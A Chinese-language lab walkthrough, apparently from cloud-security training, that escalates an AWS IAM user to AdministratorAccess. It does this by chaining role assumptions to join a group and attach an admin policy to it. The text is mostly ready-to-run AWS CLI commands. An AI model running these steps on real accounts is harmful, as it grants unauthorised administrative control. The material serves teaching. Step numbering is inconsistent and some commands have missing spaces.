国内云安全培训请点击原文或访问以下链接
https://www.yuque.com/u8047536/supvqp/ri4ft0
前提是已经获取了相关的密钥
步骤 1:将 AWS CLI配置为访问凭证
aws configure
步骤 2:列出附加到xx用户的策略
aws iam list-attached-user-policies --user-name xx
步骤 3:尝试创建一个名为 Bob 的新用户
aws iam create-user--user-nameBob
由于权限不足,用户创建失败
步骤 5:获取有关用户内联策略的信息并枚举附加的策略
aws iam list-user-policies --user-name xx
aws iam get-user-policy --user-name xx--policy-name terraform-20210211051758659400000002
查看策略中提到的资源
步骤 6: 查看附加到 Adder 的策略并查看角色策略文档
aws iam list-role-policies --role-name Adder
aws iam get-role-policy --role-name Adder --policy-name AddUse
角色策略表示,角色 Adder 有权将任何用户添加到Printers组
步骤 7:与xx用户一起使用Adder 角色
aws sts assume-role --role-arn arn:aws:iam::5xxxxxxx8:role/Adder --role-session-name adder_test
记 下 凭据和令牌
步骤 8:在环境变量中设置访问密钥 ID、秘密访问密钥和会话令牌
export AWS_ACCESS_KEY_ID=<access key id>
export AWS_SECRET_ACCESS_KEY=<secret access key>
export AWS_SESSION_TOKEN=<session token>
步骤 9:将 xx 用户 添加到 Printers 组
aws iam add-user-to-group --group-name Printers --user-name xx
步骤 10:取消设置的环境变量
unset AWS_ACCESS_KEY_ID
unset AWS_SECRET_ACCESS_KEY.
unset AWS_SESSION_TOKEN
步骤 11:列出xx用户所在的组
aws iam list-groups-for-user --user-name xx
已成功 将xx用户 添加到 Printers组。
步骤 11:查看附加到Attacher角色的策略,并检查角色策略文档
aws iam list-role-policies --role-name Attacher
aws iam get-role-policy --role-name Attacher --policy-name AttachPolicy
角色Attacher有权将任何策略附加到Printers组
步骤 12:识别 AdministratorAccess 策略的 ARN
aws iam list-policies | grep 'AdministratorAccess
步骤 13: 代入 Attacher 角色
aws sts assume-role --role-arn arn:aws:iam::6xxxxxx6:role/Attacher --role-session-name attacher_test
记 下凭据和令牌
步骤 14:在环境变量中设置访问密钥 ID、秘密访问密钥和会话令牌
export AWS_ACCESS_KEY_ID=<access key id>
export AWS_SECRET_ACCESS_KEY=<secret access key>
export AWS_SESSION_TOKEN=<session token>
步骤 15:将 AdministratorAccess (管理员访问)角色附加到Printers组
aws iam attach-group-policy --group-name Printers --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
步骤 16: 取消设置所有环境变量
unset AWS_ACCESS_KEY_ID
unset AWS_SECRET_ACCESS_KEY.
unset AWS_SESSION_TOKEN
步骤 17:检查附加到 Printers组的策略
aws iam list-attached-group-policies --group-name Printers
已成功将管理员访问策略附加到Printers组
步骤 18:尝试创建名为Bob的新用户以验证管理员访问权限
aws iam create-user --user-name Bob
已成功执行特权操作
1.AWSCLI(https://docs.aws.amazon.com/cli/latest/reference/)